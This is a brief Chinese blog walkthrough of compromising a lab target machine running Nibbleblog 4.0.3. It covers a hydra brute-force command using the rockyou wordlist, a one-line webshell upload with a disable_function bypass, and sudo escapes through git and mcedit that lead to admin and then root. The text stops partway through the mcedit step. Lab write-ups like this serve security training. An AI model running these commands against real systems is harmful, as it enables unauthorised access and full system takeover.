靶机渗透 blog

端口

访问 80 端口

目录扫描

在 /my_weblog 目录下

访问 README

发现是使用 nibbleblog 搭建的，4.0.3版本存在任意文件上传漏洞

需要使用到后台的账号密码

账号爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect"

自动测试失败，手动测试

上传一句话木马

通过 /wp_weblog/content/private/plugins/mu_image/image.php 连接

这里还需要绕过 disable_function

执行 sudo -l

使用 git 提权到 admin 用户

sudo -u admin git -p help config
!/bin/sh

admin 用户 可以以 root 用户执行 mcedit

使用 mcedit 提权

sudo mcedit

左上角点击 User menu…